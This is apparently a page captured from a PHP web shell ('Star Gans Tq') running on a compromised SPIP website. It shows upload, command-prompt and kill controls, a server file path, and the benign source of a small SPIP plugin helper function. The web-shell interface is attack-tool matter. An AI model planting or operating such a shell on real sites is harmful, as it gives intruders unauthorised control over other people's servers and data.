.=< { Star Gans Tq } >=.

  • Home

  • Killme
  • Download
  • Current Path : /home/m/e/h/meharicl/www/plugins/auto/spip-bonux/
    Upload File
    @Command ~ $  
    Current File : /home/m/e/h/meharicl/www/plugins/auto/spip-bonux/style_prive_plugins_fonctions.php

    <?php
    
    if (!defined("_ECRIRE_INC_VERSION")) return;
    
    function tous_les_fonds($dir,$pattern){
    	$liste = find_all_in_path($dir,$pattern);
    	foreach($liste as $k=>$v)
    		$liste[$k] = $dir . basename($v,'.html');
    	return $liste;
    }
    
    ?>